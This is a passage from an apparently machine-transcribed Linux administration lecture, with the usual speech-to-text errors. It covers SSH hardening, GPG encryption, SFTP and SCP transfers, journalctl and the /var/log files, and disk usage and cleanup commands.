from your where it’s currently sitting as your ID RSA inside of your authorized keys and then you’ll be able to enter whatever that server is without entering your password again right so it’s in some point for this at some point you do need to provide a password otherwise none of the other stuff is going to work so just keep that in mind okay now that we’ve talked about authentication we need to talk about secure shell and configuring secure shell so secure shell is a very powerful tool for remote access and it still is used currently um in the modern era in 2024 going into 2025 secure shell is still one of the most powerful ways to access a Linux server specifically Al um so it runs on Port 22 by default and uh for the most part the only thing that is required to access secure shell is a password unless you do other things to enhance the security which is what we’re going to be talking about when you enhance the security of something you are hardening the security okay so we are going to harden SSH configurations to mitigate any potential threats and these are some of the key steps to do it number one you want to change the default Port so by default it runs on Port 22 simply changing the port can help you reduce reduce the risk of automated Brute Force attacks that Target that default Port because everybody and their mother if you even if you’re like a brand new hacker you know that Port 22 is secure shell and it is the port for remote login so you’re going to attack Port 22 for the most part so the first thing would just be change the default SSH port and you can do that through the SSH configuration file by doing that or the way to do that would be to actually go into the sshd configuration file so you already know that sshd stands for the Damon of SSH and there’s a configuration file for it you’ll find the line that says Port 22 and it’s typically um commented out because it’s not modified so you need to uncomment it meaning just remove this hashtag at the beginning and then change it from Port 22 to 2222 for example and then you can also change that for literally anything else so there’s the top thousand ports which are usually assigned to something so you don’t want to use any of those top thousand ports you want to find anything past thousand or past 2,000 because it is not going to be a common Port anymore and at that point you can just use any of the 65,000 ports or let’s say 63,000 ports if you don’t consider the first two ,000 ports anything past 63,000 you can literally use any of those to be your Port 22 or your SSH Port excuse me it could be the replacement for Port 22 and once you’ve done that using Nano you can then just uh save the file and close it out and now you have uh reassigned your actual port for SSH the next that would be to disable root login so not allowing the root user to actually log in via SSH is a very strong move because if they are if any hacker is allowed to actually log in as a root user they get all the root permissions and I mean just figure out what the rest of the problems will be after the fact so you just disable root login and then it forces whoever the attacker is or whoever anybody is to log in as a standard user account and then they have to escalate privileges if they need to get the rest of the things that they need to get done so first logging in as a standard user is going to be a problem for them especially if you have really strong password policies that you enforce in your company once they log in as a standard user now they have to find a way to escalate Privileges and actually become an administrator or become a root user to be able to do the rest of the things that they want to do so that would be another really simple move that’s very very powerful you just disable the root login now the way to do that would again be inside of the sshd configuration file which would be with the permit root login portion so again you just find this particular line that starts with permit root login and then it says prohibit password is the default so you uncomment it you remove the hashtag and then you just say permit R login no so you remove the prohibit password portion which means that as long as uh they have the password they can get in it’s prohibited unless they have a password that’s essentially what the default is and what you want to do is you just want to change it from from this to no nobody can log in as root root login is not allowed and then you just save the file and you exit the editor the next portion would be to limit the SSH users so you just designate which users can actually log in Via SSH and nobody else can unless they’re on that white list and this is also another very powerful tool that is very very simple to do and it just goes miles as far as security is concerned so you have a handful of people that can log in via the SSH portal um and this is again done on the SSH configuration file so you find the portion uh where it says allow users uh if it’s not there you would just add it yourself and it is case sensitive so it is capital a capital u allow users and then username one username two and obviously those are the actual usernames that can log in Via SSH and I mean I would keep it to a small group of people I would not go crazy with this you don’t want a bunch of people to be able to log in Via SSH you just want uh whoever the admins are and whoever the specific uh it administrator is or the CEO or a CTO whoever those important people are you just want those people to be able to access SSH and then from there nobody else can access SSH and just close it off close it off to everybody else if they want to access their file systems remotely you give them a sep portal that is encrypted and you give them a different way that they can access a file system remotely they should not come in Via Port 22 or the SSH Port whichever Port has been designated for that specific service you do not want them to use SSH you want them to use a different login mechanism that is encrypted and runs across a VPN and a variety of different authentication methods so that they can access the file system remotely and do what they need to do they should not be coming in Via secure shell that’s the whole point here once you have done all of those things you need to restart the SSH service by just doing a system CTL restart command and it will restart the service which means that it’ll apply all the configurations that you just made to the configuration file for SSH so this part is very very important if you don’t restart it then it will not enforce all of those rules that you just added to the configuration file F in summary you want to change the default SSH Port you do this by editing the configuration file finding the portion that has the port 22 and then changing it to whatever your new port number is going to be you’re going to disable root login in the same exact file you’re going to go and find permit root login and you’re going to change it from whatever the current setting is to no simply no no root user is allowed to log in Via SSH and then you will edit the uh config file by adding the allow users parameter the allow users option so that you can uh designate which L users which limited number of users should be able to log in Via SSH and then after the whole thing is done you’ve saved the configuration file you need to restart the SSH system the SSH service so that all of the rules that we just created will now be enforced and that way you can actually conect configure your SSH for secure access and now we need to talk about encryption and the secure transferring of files which is another very very important concept so um encrypting data with gpg so gpg is a tool for communication securely right so securing Communications and data transfer essentially um it uses asymmetric encryption which involves a pair of keys a public key and a private key as we’ve already discussed with our key genen portion the public key is used to encrypt the data and the private key is used to decrypt the data so public key locks it private key unlocks it this ensures that only the intended recipient recipient who possesses the private key can read the encrypted message my accent kicks in sometimes and I’m like oh my god um so only the person who has the private key is the one that’s allowed to decrypt the message or file so that they can get access to its contents so it’s very simple simple concept but again really really powerful concept so we’re doing it with gpg so you generate a key with gpg you do gpg D- gen key it generates a new key pair you’ll be prompted to provide the name email address optional comment and you can also set a passphrase for additional security which I always recommend that you do and then once the key has been generated you select the key type the size of its that you want it usually uh the default is very useful but I do recommend if it gives you like a really massive option I do recommend getting like the largest type of key that you can find because it the bigger the key type is the more powerful it becomes and the harder it becomes to be decrypted um you set an expiration date for the key if you want to do that and then you enter a passphrase if you want to private uh protect a private key which I again I recommend that you do that so these are the steps that you would do to generate your key with gpg this is what the output looks like so you run the gpg uh command and then this is the top portion of it and it says it needs to construct a user ID to identify your key so the real name would be Alice the email address would be this person comment would be this you selected this user ID Alice y y y change email comment or is everything okay and then you just say okay and you press enter and then it continues to do what it does this piece is right here for the rest of what we’re going to be talking about so this is essentially the user ID that will be assigned to this key that’s being generated and when we get to the encryption of a file you need to actually give the uh the recipient to the command right so you’re going to do gpg encrypt the r would be the recipient themselves and in that particular case it would be this person right this is the IDE of the recipient and so when you run this command you would put the ID of the recipient and then the file name that you want to be encrypted and then it will encrypt that file name and then whatever the key is for that specific person that will be what’s used to decrypt this file name this is what that actual command would look like when you actually use somebody’s ID so same Command right so gpg yada y y and then we have Bob at example which would be the user so the recipient in this case that that’s the ID for the person which is Bob at example and then the name of the file that’s going to be encrypted and then once it is been encrypted the encrypted file will have a gpg extension at the end of it so it will stay it still says document.txt it’ll just say. gpg at the end of it implying that this has now been encrypted and then this is the file that will be sent to Bob and then Bob will be the person that has the only key that would be able to decrypt this particular file Bob would then need to run this command to decrypt the file so instead of- e it would just be A- D for decrypt and then it would be the file name with the extension of gpg and then that’s what would happen to actually decrypt the file the key would need to be added to their key log um which we’ll do in a couple of slides but essentially this is how the file would be decrypted and you run the command to decrypt a file you’ll be prompted to enter the passphrase if there was one and then that’s how it would be decrypted so very simple so this is what the actual full thing looks like right so you just do gpg uh- D document text PHP or gpg excuse me and then it’ll output the decrypted content into the actual console um instead of doing that you can output it into a text file or into any given kind of file by using the- o flag so instead of it being printed onto the console which is the default you can just run exactly the same command just do- O and A assign a name which would be for example decrypted document.txt and then you give it the gpg file and then it’ll decrypt it and it’ll output it inside of this file for later use to be able to import a key we will use the import command with gpg and we would do– import and then the public key file and it’ll import the public key from a file into your gpg key string there you go it’s called a key string or key ring sorry key ring not a key log so it’ll import the key file into your key ring and this is what it looks like right so this is Bob’s public key and it’s going to be imported into Bob’s key ring when he runs this and then he can run the decrypt Command right um if you wanted to export the public key you would run the export command uh with the a uh option right here for the user ID themselves and then you would export it into a public key file so it’ll export the public key into a file replace user ID with the user uh with the email or key ID for the person and then the public key file would be the name of the actual output file itself and this would be the file that would be imported into the key ring using the import command later on and the export of the public key would actually look like this in this particular case so you have the export of this particular user’s key that would be exported into this key file right here and then this would be the file that you would email them and then they would need to import it into their key ring or you would not email them it would probably be like a secure copy kind of a situation and then once they have that they would be able to import it into their key ring and then use it to decrypt a file if you want to list the keys that you’ve generated you would just use the list Keys command and it’ll show all the keys that are inside of the GP gpg key ring including the key IDs the user IDs associated with them and the types of keys that they are so in summary it’s a very versatile tool for securing files and Communications using public and private key pairs um with the commands for generating them encrypting and decrypting files managing them it ensures that your data remains confidential and secure and this is as you saw it’s not a complicated tool to run uh the process is fairly simple right you generate the key you encrypt the file and you encrypt it with the ID of the person that should be able to decrypt it and then you create uh you import or excuse me you export sorry you export that person’s key into a key document a key file you get them that key file they would import that key file into their key ring and then they would be able to use that to decrypt whatever the file is that they’re supposed to decrypt and typically if you’ve already added a passphrase to kind of double up the security for that file then they would also need the passphrase to be able to do that so if somebody intercepts that individual key file that you generated for them and then you emailed them or secured copied whatever if somebody intercepts that key file but they don’t have the password to access that key file then they still wouldn’t be able to decrypt the original document which provides an extra layer of security and I would recommend that you send the password to the key file in a separate type of a medium so you text them the password and you email them the actual key file for example so that there’s two different Communications that have happened through two different mediums so if somebody is intercepting their emails for example they won’t be able to get the password that you texted them or you send them through WhatsApp or a different method of communication you could call them and say this is what it is write it down so that nobody can actually there’s no digital layer of evidence for that transfer of information so there’s a lot of different ways that you can secure this but I would highly recommend that every single key file that you’ve generated and every file that’s been encrypted also has a password that’s attached to that key so that it can be decrypted using the password as well as the key and this is the perfect segue into secure file transferring and we can do this with SCP which is secure file copy or SFP which is the secure file transfer protocol um so this is essentially the way that you would transfer those key files that you just generated as well as the the document itself that was encrypted right so the file that was encrypted as well as the key that was generated you can be able to transfer them using either SCP or SFTP so SFTP is the interactive protocol for um file transfer it is the secure version of FTP which is a very very common protocol that was used for a very long time until they found out that it’s not secure because most things are clear text and they developed the encrypted version of it the SFTP version and it’s more flexible and user friendly because it’s interactive right so once somebody has the login for the FTP the file transfer protocol they can kind of navigate it very similar to the way that they would navigate um any any Linux uh file structure any Linux file system so a lot of the same commands that would run inside of a terminal for a file system actually run on the SFTP once the person is logged in so you can do SFTP user at host and you would start the SFTP session as such and then you can put the file inside of this particular server and then somebody else can log in and then access that file and download it onto their computer so it’ll initiate the SFTP session with the specified user on the remote host and then you can run the ls command for example to list the contents in the directory you can change your directory into the path of another directory because you’re inside of a file system right now you’re inside of a file transfer protocol so you’re literally inside of a file system that is just being managed remotely and you can download the file right you could just say get of this file and you can put a file inside of it so there there’s a uh for example the file that you just encrypted using uh the commands that we just ran through um we can take all of those files as well as the the key that we just generated and we can take both of those and put it inside of the FTP file transfer Portion by using put and then the person on the rece side would log in and then they would use get and they would download those files onto their local machine so that they can decrypt them and they can get access to them um you can do a get R for remote directory and you would recursively download everything that is inside of that directory onto your computer so instead of doing a individual file that you would do with get remote file you would get the entire contents of the directory and you could do the same thing with put our local directory so recursively put everything inside of this directory into the file transfer protocol and then they would be able to get it on the receiving side while logging in so this is what an example would look like so the user Alice on this particular IP address so you just do SFTP Alice at this particular IP address you would be prompted to enter the password for Alice so this is not just going to immediately let you to run LS that’s simply not how it works so once you run this command you are going to be prompted to enter a password you enter the password if you have the right password you now are inside of this particular server as Alice and then you can list the contents of that home directory so on and so forth so once you’re there let’s say you want to transfer contents to somebody else you would first do put project zip inside of this particular server and now it exists inside of that file hierarchy and then from there somebody else can log in or you can log in you know Alice for example can log in from a different computer onto to this exact server and then get that exact file onto the machine that they’re now logged into so you can download a file name example from the the file system using this you can put the file inside of the file system using the put command so it’s very simple um secure copy would be the quick and straight forwarded file transfer over SSH which uh is essentially the streamlined quick version of doing this particular command which is the SFTP command um and we’re going to run through some examples for running secure copy as well but SFTP is logging into a file system secure copy is just transferring the file from one host to another one and this is what the SCP example looks like so the command is SCP and then this is transferring from our computer to the remote host so you would do SCP and then the path to the actual file that you want to transfer and then you’re going to do the username at remote host and then the path to where it’s going to land and this essentially you kind of can designate wherever you want it to land this part is very very important and what happens as soon as you press enter you’re going to be asked for the password of this particular person at this host so this is not just going to transfer the file willy-nilly right you need to still have the password of this particular person at this host and then it’ll just transfer where this file into this particular location and it’s really as simple as that there is no logging into a file system running LS and getting and putting and all of those extra commands You’re simply just doing a secure copy very similar to a copy command that you would do locally on your computer you’re just doing it from your location to their location so this is going from your computer to their computer this version is coming from their computer to your computer so essentially you’ve just reversed the order of this particular command and then you’re doing secure copy the username and then the path to that actual file and it’s coming to the path on your current directory or in your current computer and again as soon as you press enter you’re going to be prompted to provide the password for this username at this remote host so that you can copy the location or you can copy the file from that location what’s important is that in this particular example this is actually very important right so in this example it wasn’t really that important cuz you you can just transfer this into wherever you essentially want on their computer that you just need to tell them where you put it so that they know where it is um the path of the local file is important in this version because you just need to know where it is that and what file it is that you want to transfer out in this example this path is very important because you need to know exactly where the file is that you want to transfer to your computer and then this part of it isn’t as important because you could just put it anywhere as long as you know where you just put that file so this is what secure copy is and how you can transfer a file securely and it’s again very simple command it’s one command that does the job instead of having to log into a file system and do all the rest of the stuff that we did with SFTP you’re literally just doing a secure copy from one location to another except you’re just doing it across a uh secure Port which is actually Port 22 or or whatever your Port is for secure shell so this is going across that secure shell port and is copying the file either from their location to your location or from your location to their location and that’s basically what secure copy does so very very very powerful tool to be able to transfer files you just need to know the password for the actual username on that individual host that you want to either pull the file from or send the file to and that’s basically it for secure copy okay so now it’s time to talk about troubleshooting and system maintenance and the first part of this is log files so how to analyze and interpret log files and the very first uh command that we’re going to go over for this is Journal CTL or Journal control for system logs and journal CTL is a very powerful command line utility for viewing and managing logs that are generated by the system D Journal so this is the more modern version versions of Linux that run systemd as their in it processes so it’s particularly useful for system administrators and developers to troubleshoot and maintain system Health on Linux systems that use system D so that’s what Journal CTL is now to be able to view everything on the log you just run Journal CTL and then you press enter and it displays all the logs recorded by System djournal starting from the oldest entry to the newest so chronologically going from the oldest to the newest and it clud system messages kernel logs as well as application logs um the filter by boot so if you just wanted to see logs from the current boot that’s going on um or the current boot session so to speak you would run journal c-b and this is particularly useful for diagnosing issues that occur during system startup and then we have filtering by Boot and then you have the dash one so this is logs from the previous boot uh you can adjust a number to view logs from earlier boots so uh if you go -2 it’ll go prior to that Dash uh three so on and so forth so- B would be the current boot just by itself and then -1 would go back to the previous Boot and then you can keep going back further to be able to find uh all the boots prior to that that are still inside of the log so at a certain point the log will have most likely stopped recording the boots um so from there uh you you can kind of just try to figure out how many you have in store in the log so that you can try to troubleshoot if you need to or go back go as far back as the logs will allow you to go you can filter by a service Name by using the dasu option and then you would provide the service name to it so it’ll display all the logs that are related to a specific service and then obviously replace the service name with the name of it so you would need to run the uh one of the previous commands that we went through for example top as an example to see what all of the various services are that are running and then from there you can look at the logs that would be relevant to that specific service by using journal c-u and then the name of the service and then we have the SSH as the example in this particular case so dasu SSH would display all the logs that would be relevant to the SSH service if you wanted to view real time log updates you would look at Journal c-f which would be similar to the tail – F command that would be applied to uh any log file essentially because tail would show you all of the the bottom entries at the bottom of the log which would be the most recent entries that have been appended to that particular Lo log file the entries that have been added to that log file so it’s similar to running tail-f command on that particular log in this particular case we’re doing journal c-f and it will give you realtime log updates as the entries are added to the log and as the system log or the log itself is being updated so you could combine this with any of the various log options that are available so that you can see the most recent or realtime additions that have been going to that particular log so it’s very useful for looking at live system activity or diagnosing issues as they occur then you can filter by time so you can do Journal CTL D- since and then you would provide it the the time as you see in that particular format and I think that’s called that’s the universal uh time standard I want to say I’m not exactly sure but it’s it’s in the format that you see on the screen so I don’t know what the technical term for that format is where you see the year the year the month and the day and then the hour minute and the second uh you can say since that time you know I want you to show me all of the entries that have come from that time filtering by time will look like this if you wanted to provide the actual time into it so you can see that they didn’t provide the second in this example we didn’t provide the minute in this example we just said from 8:00 on November 15th 2024 I want you to show me uh all of the entries that have come through this particular log right so that’s essentially what it will look like you don’t need to give it the the time the minute and the second unless you really are trying to narrow down on a specific incident that took place so that you can get the the results that you’re looking for to provide uh Mur uh further context for your investigation so to speak uh but usually you can just say at you know 8: a.m. on this particular day I want you to show me everything that happened since that particular time so if you wanted to filter By Priority you would just use the dash p and then the priority um and the level would be needed to be provided to it so if it’s a level zero which would be emergent meaning emergency uh to a level seven which is just a debugging kind of a priority level you can say uh what you want that priority level to look like so it’ll say if you do- P0 it’s going to show you everything from zero on up if you do uh Dash I guess it would go from seven on up so it would show you 7654321 0 uh 654321 0 so on and so forth so that’s what it would look like if you wanted to go by the priority level and uh show essentially every event that happens from that level that you’ve assigned all the way up to all the other levels um you can also do by an error type of a uh message or an error level message and higher so still priority flag so- p and then err would be all of the logs that have the error priority and higher and then it just continues on from there if you wanted to you uh filter by unit and time so we’re going by the service name as well as the time you can combine them so this is uh all of these commands are able to be combined together this is not to say that you get to use one or the other and this is the example that we got in this particular case so you can do – SSH and then since you know November 20th 2024 and on you know what I mean so you can combine filtering by services and time or a variety of other options so you can service and time and priority for example you can combine these various options to filter the log files so you can get the information that you’re looking for so this is what the example itself would actually look like right so – us SSH since November 15 2024 at 8:00 a.m. it will show you all of the log items for SSH since uh 8: a.m. on November 15 2024 so in summary you can look at Journal CTL as a tool for system administrators that are using system dbased Linux system so uh it won’t work for CIS vinet because it doesn’t exist on CIS vinet so Journal CTL will only work with system dbased Linux systems and then from there you can look at a lot of different options for viewing and filtering during logs and of course we’re going to go into all of those options and run a bunch of different formats of the journal CTL command as we go into our practical portion of this training Series so you can get a good understanding of how to use it and all the different filtering options that are available for Journal CTL until then this is this is going to serve as your little cheat sheet so you can view the entire log you can filter by the boot you can filter by the service uh filter real time log updates filter by time itself and filter By Priority or you can combine all of these to create a very specific filter to look at a very specific series of incidents that have taken place or a series of log items so you can combine all of these options to create a very specific viewing rule with Journal CTL but this is just a kind of a sample of the common commands that are run with Journal CTL for looking at system logs as we discussed in the file system hierarchy standard portion where we were looking at the main uh hierarchy of the file system in Linux we figured out that the logs are stored inside of the ver log directory so a lot of logs are in this particular uh directory and uh this is the central location for log files in Linux basically um you can get system events service activities application Behavior security incidents and everything in between uh analyzing these particular logs s admins can troubleshoot issues monitor system performance and enhance security and in a lot of cases you don’t even have to do it manually you can use a security Appliance to do it for you or you can try you know take all of the logs that are in this particular location feed it into Splunk as an instance or you can connect Linux into Splunk so that it gets live updates from your logs and then from there it can help you analyze the events that are going on in your logs uh if you don’t want to pay for something like Splunk you can always use wazu or a variety of different uh tools that we have Cabana if from elastic stack that’s another really good one that you can use that’s an open source tool that can be used to look at log files so very very useful location because it holds all of the logs that have to do with everything that goes on with your system so some of the key logs inside of the ver log directory would be the CIS log or the messages log so to speak so these are the general system log files that record a wide range of system events including kernel messages logs and service activities so it could be either the CIS log or the messages log and so there’s the distribution differences that would be uh relevant to these particular uh types of log so when you see CIS log it’s for deban based systems like Ubuntu when you see the messages that’s for Red Hat based systems like Centos or Fedora so the usage in the again would be to use uh tail f for example or just use Journal CTL for example um but in this particular case since you’re looking at an actual log you want to be using Journal CTL cuz Journal CTL has its own series of logs so in this particular case we’re going to be using tail-f to look at the last series The the bottom portion of this log file you will look at the last 10 lines for example which would be the most recent entries inside of the CIS log file same thing with this one where you would look at the most recent entries inside of the messages file another one would be the authentic a log the off log and this file contains information related to authentication and authorization so anybody who’s trying to log in any login attempts whether they were successful or unsuccessful user authentication processes or privilege escalation attempts all of these things would be uh stored inside of the Au log so anything that has to do with authentication or authorization would be stored inside of the off log and the view again would be tail F to look at the most recent uh additions that have happened to this log and it will show you everything at the bottom of that log file by using the tail command so uh this is very important for unauthorized access attempts and anything that is also security related so the authentication file or the off log I should say this is one of the key files that security analysts will constantly look at and keep an eye on especially in a large environment because you want to see if there are any uh failed login attempts or repeated failed login attempts or successful attempts that have come in during odd hours of the day uh or anything of the sorts just to uh figure out if people who should not be logging in are actually logging in or trying to log in um then we have another one which is the DMG so D message I kind of look at it like that but dmesg could be the one um it’ll records messages from the kernel ring buffer which contains information about Hardware components and the status of the hardware so the initialization of the device itself for example or the drivers that may be connected to your system for your printer or uh or anything that is a physical connection to your computer or any other hardware error that may go on with your individual machine and again it would be used as uh the tail F command to look at the most recent uh entries that have gone into this particular log file so um it’s very useful for diagnosing any kind of a hardware issue that’s going on and understanding the state of Kernel activity so if you remember the kernel is the entity that connects the user and anything that we use as the user to the actual Hardware so it’s the bridge that connects the hardware and everything inside of the actual physical computer to us the user so that we can communicate with it so if there’s any kind of a kernel issue or any kind of a kernel hard troubleshooting that you need to do you would do it with the D message log and then we have the secure log and this is specific to Red Hat based systems like Fedora or uh you know Red Hat Red Hat Enterprise Linux um this is the file that records security related events especially those related to secure shell as well as other secure services so SFTP for example or SCP that we just recently covered in the last chapter so this is where anything that has has to do with secure versions of a specific service all of those things would be uh logged in this particular file uh and this is uh for Red Hat based system so it wouldn’t apply to Ubuntu for example it would be Cent OS it would be Fedora and everything along those lines that would be considered a red hat-based system and this is the viewership so this is just a command and by now you should have memorized this so pseudo tail-f and then you would give the path of the log file and and it would give you the last 10 or 20 or however many lines that you would designate on this particular log which would be the most recent incidents that would happen inside of the secure file so for example failed login attempts and changes in user permissions which all have to do with security so anything that has to do with security and anything that we covered in our security portion of this training series most often than not is going to be inside of this particular log file for red hat-based system systems so this is our first example here so if you want to monitor a gener uh General system log you could look at the Cy log that would be on a Debian based system or and if it’s on a red hat based system you would look at the messages if you wanted to look at recent authentication events you would look at the authentication log or the off log that would be anything that has to do with authentication or authorization and again the tail would give you the last 10 Lin lines or the last number of lines that have been entered which would represent the most recent if you just wanted to look at everything inside of that file you could just open it up with Nano you would still need to do pseudo Nano but then it would open up the entire file which is a very massive file most likely so it will be very overwhelming uh you can search through it with GP right so the various tools that we’ve covered and then we’re going to do a lot of these things as well when we get into the Practical section but typically you would look at tail um or you would use tail to look at it so that you can see the most recent authentication events that have taken place um another example would be konel messages so you could do dmesg and that would give you all of the kernel messages or you could look at the most recent entries to that in real time for example which would be the tail-f which give you all the recent uh entries that have gone into the dmesg file and then you have looking at the secure file so security related events on a Red Hat system uh which could be anything that has to do with secure shell secure file transfer anything that has to do with changing permissions or ownership for example all of that stuff would be in uh inside of the secure log file itself so in summary we have the ver log thear log however you want to pronounce it we have this particular directory that is a treasure Trove of information it contains logs for everything all of the logs are inside of this and when we actually look at the uh the log file when we go into the Practical portion of this and I’ll do an LS command for you so you can see the number of log files that are inside of this thing it’s massive uh the ones that we went through are key log files that everybody should know about but there are literally dozens of log files that are inside of this particular directory and you can get a lot of different information from those log files so it all just depends on what you’re looking for and in a lot of cases individual applications that you install will also get their own log entries that will come inside of this exact directory so there might be something for MySQL there might be something for Apachi and a variety of different software services that would be installed on that machine that they get their own log files as well so um they’re just important location for you to consider right so anything that has to do with security and Security Administration or troubleshooting would all be done from these log files that are in stored in Star inside of our VAR log directory and these are some of our specific logs that you should keep in mind just as a screenshot so uh you already see you’ve already seen all of these so I’m not going to go through all of them but if you wanted to screenshot this one two 3 and ‘s up okay now we need to look at the usage of the disc itself and any cleanup that would need to be done so we’ve already looked at this particular command which is the DF command and uh DF and du kind of go hand inand and they help you look at uh everything that has to do with your disk so um dis usage analysis and cleanup is very important for maintaining system performance because a lot of times clutter tends to add up inside of the system and you just need to make sure that you are good with your storage right especially if you’re managing a bunch of different users and they have a bunch of different files and media and everything that they’re downloading and using there needs to be disk usage uh processes in place place to just make sure that uh you are good with storage this is more important for storage than really anything else in my opinion but it’s also a security issue as well so you just want to make sure that there is no uh you stay ahead of it so that there are no issues and the system doesn’t crash because it uh it doesn’t have enough storage or the ram doesn’t slow down or any of these things because there’s just too many things for the system to be taken care of so the two primary tools that we have are DF and and du so DF is the disk file system as you should already know and it’s a command line utility that displays information about the available and used disk space on our file system and this is just one of the simple commands so the dashh option with the f is human readable that’s what it stands for so it formats the output in an understandable way meaning that it’ll give you kilobyte usage and it may give you a tree breakdown or like a tree format view of it so you can kind of have a good understand of what you’re looking at on the terminal so df- will give you the dis usage as well as the memory usage and all those things in a human readable format so this is what the potential output might actually look like so you run it and then you can see that for this fire file system which is our uh primary SDA file system partition one has a size of 50 GB 30 GB has been used there’s 20 GB that’s available the percentage would be 60% % of this Total Space has been used and it’s mounted on our root directory and then the second partition has a 100 GB assigned to it 70 GB has been used 30 is available which means that there’s a 70% usage and it’s mounted on to the home directory that’s inside of the rout and the home directory specifically is for all of our users so it makes sense that there is more usage that has been done over here because most likely there’s multiple users that have file and media and everything that’s being stored inside of that directory so it’s using up a lot more space so that’s what the disk usage the DF command uh helps us find and du itself is the dis us it stands for dis usage and this is a command line utility that estimates and displays the disk space used by files and directory so it’s actually very similar to what we’re doing with our disk file system Command right so it’s it’s really not that different the intention of it is is the same um just a different command and it gives you a little bit of a different uh response here so you would do dis usage du D- sh and then you have to give it the path to the directory so- s s excuse me stands for the uh summary of the total dis usage and then the H stands for the human readable so same thing as the dis file system portion so the human readable and then give me a summary and so the example command would actually be this so dis usage dsh for the home user directory and it just gives you that there’s 5.2 GB on the home user directory that has been used so disk usage 5.2 GB on that particular directory that has been used um if you wanted to look at the full directory and then do a little bit of sorting and give you the top 10 lines for example so this is what this entire command is doing for us so we’re looking at a human readable format for this particular path and then we’re going to take this result and we’re going to pipe it into the sort command and then we’re going to take the top 10 lines from all of the output that we got so dis usage H will give you the dis usage for the specified path and human readable format sort RH will sort the output in a reverse order that’s what the r stands for and then based on human readable sizes which is what the H stands for and then the head N1 will show you the top 10 largest directories if we did 10 tail n 10 it will give you the bottom 10 uh largest directory so we’re sorting it and typically when you use sort it’s in ascending order so it’ll go in alphabetical A to Z or numerical smallest to largest so if we want to see the largest first we would do it in reverse order which is why we have the DHR and then H would be the human readable portion of it and then now it gives us the top 10 which would be the top largest files so this is potentially what the output itself would actually look like so we’re looking at the VAR directory that has all the logs and everything in it and then we’re sorting it in reverse order and we want the top 10 so it says the log directory understandably because there are so many log files and they take up so much space so the log directory would have the largest uh portion that it’s taking it takes up the most amount of gigb the biggest size right and then you have the cache which is also understandable so 1.8 GB the library has 1.2 GB and then the www that has to do with HTTP or typically it has to do with the Apachi server or any kind of a web server that is holding up 900 megabytes of data so some practical examples here we have the df- will give us the human readable disk file system command that will break it down for you by the file system and show you how much of it is being used and how much is free disk usage dsh will show you everything that’s going on on this particular uh path and it will give you the summary as well as the human readable format version of it and then this would be the the full thing if you wanted to look at everything for the home directory and then sort it in reverse order and human human ridable format and give you the top 10 results from this particular uh command so that’s how you would analyze all of those things so as a summary you have the disk file system the DF that provides an overview of the dis space usage by file system it makes it easy to see which partitions are filling up and it gives you everything on a line by line as you already saw and that’s the command D f-h and then you have the disk usage that gives you detailed insights into the actual usage by directories and files so you can identify which areas are consuming the most space this would be the summarized version for a given directory the summarized Das s and then DH for human readable on this particular directory and then you can analyze it by using the short command in reverse order and then giving you the top 10 results so those are our summaries but again we’re going to be running this as we go through our practical section so you’ll get a lot of opportunities to actually run this and use it uh and that this doesn’t mean that you can’t run these while you’re watching this so this is going to be uh this is technically the lecture format as I’ve I mean I say it literally at the end of every summary section so I just want you to keep all of that in mind so you can definitely be running these as we’re going through the lecture but uh we’re going to do like a deep dive on all of these things when we get into the Practical section so let’s talk about disk cleanup tips so this cleanup it helps maintain the system performance ensures that you have adequate storage for new data there are also essential tips and commands that we’re going to be going through to make sure that you accomplish all of those things this cleanup is a very important concept and it’s something that you should be thinking about all the time as a Linux administrator so why do we do it we want to removed any unused packages because they accumulate over time they take up a lot of space um and it kind of messes with your overall storage um they can also include dependencies that are no longer required by any installed software so you just want to make sure that you get rid of all of those things cuz they’re literally just taking up space and there’s nothing that is actually using those dependencies because they could be outdated they could be upgraded a variety of different reasons why they’re no longer relevant and you you just want to be uh be on top of this you want to do this routinely you want to do it in a scheduled manner so that it doesn’t run away from you you just want to kind of stay on top of this so to be able to remove unused packages you would use the AP um uh package manager command so we would do pseudo AP and then you just do auto remove and it removes packages that were installed as dependencies and are no longer needed by any installed packages that are currently being used so Auto remove removes anything that was installed as a dependency and is no longer actually being used by any other packages which is very very useful you don’t have to go through the list you just run pseudo AP Auto remove and it automatically removes anything that is irrelevant and then we can do it on a red hat based system so same exact thing except you’re just using dnf as your package manager so dnf instead of AP and then you would just do auto remove and then it it removes unnecessary packages and dependencies that are not being used the second reason why you want to do this is to clear all the temporary files which can also accumulate inside of the temp directory which take up disk space so uh for the most part it’s safe to delete all these things but you just got to be sure that there’s nothing that you actually need um or any applications that may be uh using any of this critical temporary files for example so uh for the most part you can delete all of these things cuz if they weren’t meant to be temporary they wouldn’t be inside of the temporary directory so that’s my approach to it if uh they were not important to be put inside of the key directories for the actual uh library for that specific application or the optional uh directory or any of the other directories that can be used if they’ve been put inside of the attemp directory for the most part they’re good to go uh the command would be remove so we’re using the r M command and then you do the RF option which is recursive so you’re doing a recursive um to delete all of the files for the temp directory now notice that there’s an asterisk at the end of this particular path which means asterisk it stands for a wild card character so it’s going to remove literally everything that is inside of the temp directory because it can be anything it could the asterisk stands for anything so TMP for/ asterisk means that anything that comes after this path it can be removed recursively and all of the files and directories uh will be removed so uh this is a very powerful command again it’ll permanently delete everything you just got to make sure that none of these things are relevant but again this is just my process My Philosophy around it if it’s inside the temp folder most likely it was going to be deleted anyways cuz it t typically does get deleted on reboots so most likely it was going to be deleted anyways or at least delete it after a certain amount of time otherwise it would not be placed inside the temp folder so for the most part I think it’s good to go then we have removing older Journal logs so this happens with a lot of uh log entries that have to do with the system for example because it’ll log everything on the system uh even if it’s just informational even if it’s uh nothing that is critical or nothing that needs to be addressed it just keeps logging everything so uh over time it’ll be a lot of log files massive massive log files that take up a lot of space so it’s important to periodically clean these or set up some kind of a script to pre periodically clean these specific log items so that uh you know they’re only maintained for let’s say 6 months or they’re maintained for a year or however long is relevant to you but after that 6-month period is over if it’s older than 6 months it should be deleted and you should move on from it or maybe if it’s older than 6 months it should be transferred out of your system and put into an external drive or something like that and that’s the way that you would manage your log files so um in a lot of environments and a lot of Enterprise environments and based on regulatory environments or compliance issues based on Regulatory Compliance you may be required to keep logs for longer than 6 months but you can transfer them from hot storage which is what’s on the computer and it’s accessible all the time time to warm storage which could be an external drive that’s easily accessible you could just plug it into the computer and get access to it or if it’s super old you can put it into Cold Storage which means it’s now sitting inside of a warehouse somewhere and then somebody would have to go retrieve it in order to be able to access that information but it’s being placed in storage uh just depends on what the compliance environment that you’re in and what they require um but typically uh usually if it’s 6 months or older especially if it’s just you on your computer if it’s like older than 3 to 6 months you can just wipe it and move on from it um in an Enterprise environment is a little bit different but for your computer for a specific personal computer you really don’t 